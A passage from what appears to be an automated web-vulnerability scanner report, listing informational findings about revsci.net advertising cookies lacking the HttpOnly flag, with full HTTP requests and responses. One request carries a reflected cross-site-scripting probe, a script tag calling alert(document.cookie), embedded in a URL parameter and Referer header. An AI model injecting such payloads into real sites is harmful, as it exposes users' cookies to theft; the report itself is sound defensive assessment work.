rsiPus_UVQe="MLsXrrEOpxpv55DW8tahZ2a57v6B9MeZL8/LTEv/jJaMn5vP+AaSaAp+hCNi+AtwkjW+RefXIKCFOb52VlJjrhtz/K0F0sWwzeRtpIdluxQek5zccFWsHLi2KM+ZjwDQCJV6O2MoC7r7STaLvqoiVDgloVhGO8DCKXMuP6S0vV0rRPMr+4FQiZzVfCjm2Lh/YkpRiZOeLmjUput9lWGJP3YqjHBlGcOU6aAjfq4ibjAuZaifAD12GV3MM7Os90125jNjah5Wl2JWXp3qoPuhHB9AUM9SIgkXkhFkXawqpm+PCmBL/rRLkNvRLqXizj1nhBAYelUSwkeFm7FWTh3bAW46hLZnvrDEVxxdlStZX6BLgYWkTXAr7NhngfM63uGRFwshyT0vUcCHgJHtHjwqb4gUK3U3Xlk/qfEyRIX0CYp3yLh6JdWmKGvTop06tZ57NWC7sYJivG6/XJXPh9kiLGmrABOJg0ZtLzzv+RMLBnPdhWdsfqH1YJwZA8zu9RM24LtkIq/AzoH015WS8axndbNjVCS0Jdy2g7tnbT4ibdPnWCemmw5DLKt17XfJqmkiLo4HNRYEQTYElhU3p/R3QmwWF2NkS16R2OV/GC10lX1vNK73Ft5xFtY5cXx7HXqH4NDid4ya00d1KxDbeGs2zvRtLTQCJxhQMPTkN34kd77C6G35LeJs2UWyjbLbkj1s/WgXM/d2WrgMkJc95WcpztNpB3veCMTXHtRpRP9j79S2eDr/UTmxj81QK+a4V5co3htv2qle9Hfxbq0j9sdrznUKUWJ5WYe1DlAdBsYmSOhPpIiQM0NaLNkyRwyAYAqCh7y5c4nZ6Tpo0r6KsvGwNO/t8O1yT6/GShgeyHXi1IvvZ0hstn43x+lxdVmaPuYX2sSMnPn4QKa12/fY0tPU6ddfwTD+9bgfDbO13IsHs6f5j2+r+EtZari1WX6nbA7T++lDvkLjcIrOl4601kWzvvi98b2F7OSSGvaJpJGavbpF/2BIRW/HC0h5tpMEm6W7+erhn93u1cBSkOvDoCr0GepDjUWA/1yQzlErEbvPIyhM3f4Jzt8JEyA2ePwz5BrQAUT9/dLtw8tewKVOKqP/qq9iEZ0wmdXyjf/AVeIc8f2yvlCzvSY+nfgoZk3nuvpBn+TM//Se4rR/DBpuCUDXQuA7A6XXEa7vK0oRNNNeyJKHti3Q1fiLowLkcct3KanqtvmCIU6n0kuFI6nT1Ahq/vOxwTNJbEJOQVxP2vHai7ZVs1Qa6BwHlMkcXR6E6DXWn7nbH651+v741MwSOh0TCFMQTTNGUekw4gX6f9HtRzUy5C/ACJ4xJ7a+tKlQGoDR42VY9foLr0PtTN/oCK3ykMmboo7thtABUtmg"; rsi_us_1000000="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"; rsi_segs_1000000=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; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; rtc_vdh9=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_vdh9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4kOheAIMDjaxq2F29zEFqICTC+braGYRkX2ILzU0ubO+NO1EpsZ5SuHqPlIcMQ/0lXam/+piUhfp6MYDi5Ltmb3W/u0nGlRZLTdLeKuvFLJgwTUBQGmkGThl5pam9X0SDfBM1hv0IyFY0OJlD25LZxlv9giU9jzd4cBIDZmhH54Gojd6/jUtx5FZUgM0a+E9ZSdZZI5yoFedrb8//hiG6CEgOEMFcjoIeueUCxtkaeQDfr1Ybo11k8JXewFWXjFkF7Clb5Fbawer1yrgahjjsBaE5ImfVwFDpu70tLiWFMA3kByEjqxkCdipzMTXYEaeZJ6BgxzRBIFTNqAqAzi/oX38PIZd66GdRlw8ucpDQxfmw6gdlHEU9znYrpDT4IHGwFrIVJvCqMoVFODAapUufdY9wfxryj4I4tUp6M1QwerLGSqWdi/5zP8Tczymm7yXUan3PBm+/v+pJydx2y4M/bpTik+dJkknw763IQz49m9/lp1xnGhB4rBJAilJb7rRfb1QpgqVkYr0LKAmIEnp+MOPBdEoEOQtUtl9mNyfeZ0o0vJ3TMg+0ybtwr5WKuG4CyJaerSWqG6+zaw3jmwxR63lfJqcBVOtpwnNvfz/fCFZe8ylIa/BMzgeHRC6dvYmU4reagzBAkh4i5kSxtwbOhcV3Cy1XGJAht5G1Q2bdyaxqHaj4Oa2P8csqTtEL8sW1qo1xQfNlI5qOPJGGlpX0zHyHPmhpn/MmF2MU2O1Wl3oRKRA1mGN/u2wrZ8lnqzpMHmMYzTXfJOZcCFpZWp5amWwhA==; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
Set-Cookie: rtc_WdNx=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:15:55 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:15:55 GMT
Content-Length: 1089

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_11028','H07707_11029','
...[SNIP]...

14.104. http://pix04.revsci.net/H07707/b3/0/3/0806180/215595401.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/215595401.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/215595401.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252Fcategory%252Fmain-topicse7f31%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%252Fscript%25253Ed4e86dd7255%252Fmergers-acquisitions%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F0%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/category/main-topicse7f31%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ed4e86dd7255/mergers-acquisitions/
Cookie: NETID01=529777297210b0ea0bebf89fb75e37bd; udm_0=MLvv7qPvYS5npS5IdtJQSJvhPx/j4C3JXuteOzZrowSCWmqpgTbMk8TbSMyqxlmLyxECNpR02+gPiezqOi+5yDykHuJcd6JJdoqLT8+i34bQnPvlwJigh1mUBVMxT2jfIxNwiDsUjsIFhNY13veukem47waFuIaQqYRyamjEvbzrtYAFMkMLhz8IyAfDJDgGAxRmbCiIOI/di7VuccpOkCFmEfIjhk5PRY/BVcGMxjjd26Gh4r3LbiC/DDBiBEkhq8JEqKIFkLwkhRrrOal9LlyDJN56E1oZkKstcU4ls+6wuVbuB+4+40PT0qOQ8ovh6fTDhw1dZ5SWaGL6x6vGDshNHJvL1UajC5eKoBIJ2xSFpyDcj4+w77js62NAT7kEPYmvqQoshwPyf2vOCimLsUgUFNNxIGmZPYzZs4PiPM+vVu1dcss0McJQrn3DO1uknbOYHQiwl9wlvyRQm0rbkjW9LIrwSiZCNdEo0ad0FuCYBgpXiDG66lxpMUq0lKVhL3YyhyI/Oj+MuDOYFK+dW/6zM7b1mda0br2f4dGKPL3vg4qXPKYWMdCSKP0Xg355P74y; NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4def5b78&0&&4dc8e6f8&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; rsi_segs_1000000=pUPNO0PF7gMQVo3R0NZJg79YWbhtcLLpBazl7mCqBpJarUW6jPV05T7tFxeDoj+1mls+pOPn4ipzReXtum8R6jVtceHfrOuuqM2RcyTARJCEBc2AEzH/3rVr/bLlN4saPMzjzgpVEetFZXp28KRvklS6CFf3iQEw3MnGhmr3G+nQbqUTDdvbvIGcFvcpsUfPj9jgHCvfBxqbUa1Pxs9qwlw=; rtc_ZiPR=MLuBm66ht4kSQA8cBQ63qpGzJe3015EFoD/9+BePfOPTKz1c+FLu1HY/qEVNhdJoj3Ynh8QtjksD7b0sBwtockByJhdI9tRqS4QHbWUMBbKZcTloFE/12EhX1Y8FdZW0OoeT+bs7ZxYnIRtoNAe/Ig3QE2yQL3rmaqXa1/vP9Hx4RKmtIevWXoON1GUKjBsIYBRgi4j/22m1waaOB9NUUcfRQjKWjWXgexJ+GRSMOAnib1sjZiN0GIokbg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_ZiPR=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNOsPC7nMUV/0bee4znL85ahvsdqPJYmPBzmH54bBx8TYNCTYObQM7enbGl6Gwz9X2lHanrF8ryjbBfhMfqjV5MpzMugEJZgqS0tRA2BY0s54Y2J3S3lZSvIJkGEakbmX73O1EdOqxfU0TWt1Dk0Jjyr11LP+EJVZ5w+avJuoz43fhFun61TlfbkhVuzsZRCINtd3vk9VxrtK2FH07+6wdxbc=; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:08 GMT; Path=/
Set-Cookie: rtc_C-P4=MLuB26mvt4kSQA8cBQ5Xp5GzJe3015EFoD/95teJL+E/r/9Dz2ruFLBtozaNrNCnxTv/CPBK4vxuKCe62VWohhBnMq1x/q0J22fzirjvhsYDeU2ou1Z4c7QpH/iIvZSk4jupAadTP3jJwOGhjpBlL0D/pb7eB9//K6gCqUY7F9avCH3SeUbAKZ8SaMucKXkSP0/UCmQq5H3prJ3dI4SCV2jsz357yIBJ1Wmb9VWkVixIXqd2sv4V4HAIcSCMcLipNC98B0t/No+oQiekPIcQ2jiRXxTdKUdmHxepDyCKFkkH2RhtOjE3aHseBOExJGngyl45Qk65yXrEpCHpsPH8; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:26:08 GMT; Path=/
Set-Cookie: NETSEGS_H07707=d303c7ec11fd6a67&H07707&0&4df0add0&0&&4dca5d68&b4e1d2b1d00ab5a43b3cb0c8a26d04a4; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:26:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:26:07 GMT
Content-Length: 849

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70010','D08734_70105','H07707_11028','H07707_11029','H07707_11044','H07707_11048'];
var rsiExp=new Date((new Date()).getTime()+2
...[SNIP]...

14.105. http://pix04.revsci.net/H07707/b3/0/3/0806180/225588936.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/225588936.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/225588936.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F09%252Fprivate-equity-has-a-horse-in-this-race%252F%26DM_CAT%3DNYTimesglobal%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/09/private-equity-has-a-horse-in-this-race/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4def57e5&0&&4dc8e6f8&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rtc_qHsP=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; 
rsiPus_UVQe="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"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_qHsP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:04:17 GMT; Path=/
Set-Cookie: rtc_l-Qz=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:04:17 GMT; Path=/
Set-Cookie: NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a8b1&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:04:17 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:04:16 GMT
Content-Length: 1089

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['D08734_70008','D08734_70010','D08734_70118','D08734_70613','D08734_72078','H07707_11017','H07707_11018','H07707_11028','H07707_11029','
...[SNIP]...

14.106. http://pix04.revsci.net/H07707/b3/0/3/0806180/273184684.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /H07707/b3/0/3/0806180/273184684.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /H07707/b3/0/3/0806180/273184684.js?D=DM_LOC%3Dhttp%253A%252F%252Fdealbook.nytimes.com%252F2011%252F05%252F10%252Fapollo-to-buy-out-american-idol-owner%252F%26DM_CAT%3DNYTimesglobal%2520%253E%2520Business%2520%253E%2520Dealbook%26DM_EOM%3D1&C=H07707 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/10/apollo-to-buy-out-american-idol-owner/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; rsiPus_UVQe="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"; rsi_us_1000000="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"; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; 
rsi_segs_1000000=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; rtc_Zy6z=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Zy6z=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:04 GMT; Path=/
Set-Cookie: rtc_z1Ed=MLvv+TMxZohq566eiyy8UbOz7zLy9mEQ8mXXGp+M0638wei+ulFK2S4Ev1MTpaDGwTDIzNSh73JhXWRrYe1q8VFI53sIxqXkW/IR8MP3tnhAKaxznh1qqAFm9HLpO7XrTCrWfZ7+P4ufmoW4lRhHEfZu71OIxcL5YJJvrGkqhNCjPWRlTPOiRjvha0je7Yv2ELCfsKqyea0kvlLmVs4Gm8JJzeVQl4IXkW57m8EzR7FsUTPxi+SDd3u2Xiub4x8QUpa02LwDN3qxBQIq1WCesHIc7ByqJtwqjLeJbob/d7fF1rxeUX6+J0FxvkWt3S2HX4pVLAyYOXqyShqsDGxKmgkrVrR3KL1vBgg3ZtBo6BDaqhpxsg6iIpBayhw1F9LzFHRr2sNjo0u3wgmpdvMOYcw9nMaWzZblmDKi23FJ0t5L/IYs9Ju+/N56Yijka3ZC7HUl3mtG7gohUcu61kuBr+80+Jmcd+2802K8Up206PnO2YdEs9lcKNoNfhgpiqT5YFmO9tDjHYpGIYY0JfBPYJYIcQUqi80mCJwAX/AnETMa3gqq0944/Zyo8YauyXnDEoHQQvgO+8O4V6WazD//pQiYoAJ/8l7qyjkDeKTsShTH3I9Rehl2RkHzFirjfVrW4lQUXp2KWdxsgVy2BCROadT9lGgUx0M54OYCsEeaedEx+LzgaggRdIcPblJOKwE5GFSMUtBpdwj1Rx3xljIXwR0c2g7tACuaNypu9CPBBxISp28Gxe2ppTT66sBRJOLWUUJd8r3zyVatHKaH7mqZQt8TIAXJTO9/boH2u+uTo7trHXN2KVXe+YxnwTqLGP1zWmsfDXgQF7t9OrY+RakN9Eq6D1NpBp7+EPUln5PF7OpqjyiN8sqguQAl5AwqGkroJssbei3CPu6qYVuROT9nZyY54sA5ktejSif6rxdQ5ymbdxvkE1CKisgwxg4BEbV07n84PmtFmgEX/In1zqD2x8d2dFM3WEG5yKuL86doNwXXA5WEcyXKyKpoS0UVtWbrn+MvawF70fCG9AUipHUXln41mbU2oXAlZnRhqTrFjhE1/ExnYnim9A7fvQcajJOaYmI58tTK5XHVX/QWmxutKJ8hE/WOF33xDUxwWqdptu9z6yb3W7aVDdBpA5kR1dw5uXeHD6KLzlmgRvv7kJ/8x+PTeY9adNaTUpRR/43yM20MyumzLkUfD9YuSRmAj3PdOubkzZZzECpSvBSbUeqzawKF64FmkaeReDZHhFeP3SKeuXFh81JxqoWW+olmwZtA5uvTqZjQhqCfS3AJDQHrzfQs3Gq8wUpErHk81OqC2eT9jZoJhYFWYffEcbMeoR9GGK+P/FYLFu24OxSLF5wg4Pqd7fze+pb5fhRFvs43/MObYLeZCsIUpeze4cemAHldrJWsMOYvwEdSqpWfT/hA6m43b0eXW/vKimOHYubf1s+KCoEyAvAwyhSsg1UMD/n5ECix5cbAH/NEPLNZObv2ZFrGz8ROhhrpbV4qVgwOzTihAgHUuNotdv10Ripo29o2tlfgw4qyMWHDI9a2OzZO9Jj3MToNpC632jMe25jRg0Y1svgMsHQ+rw5eLxxhH0zMbsXftxurEe8rycsfNsJARzCtU1gKiyDpMkYewbXMREQIvUv6p6P55ERImnL++J2ULzKqqU9rWxKwwua7x1MPrENCwjFnvHTus0m+JFyZzQfnM7NSUWlqNYUQXQUWx+FCyFNy01qoy4m5hqTPx+XrXf85zQEmswsN1w/6Hvw/8i7ioFEM6e3AuOZ2R0BpdbO2hzJsHARipxXe7Qb73wQuEH5ZujnMlR+m2CdJvF2zPrbT85qmSYD/y88kg+so6bfBA4KdgYlo3bLQopHmvw0uPbDO33MU5mG//CWfmvuVuOpqJw0lAC7l5GM3PDOfp7pQEdxZ4nptMGfi0Ft/hwzkTQZY+zhcZyGxak2zFC5WatxQ6zkE+REqcsndWN3
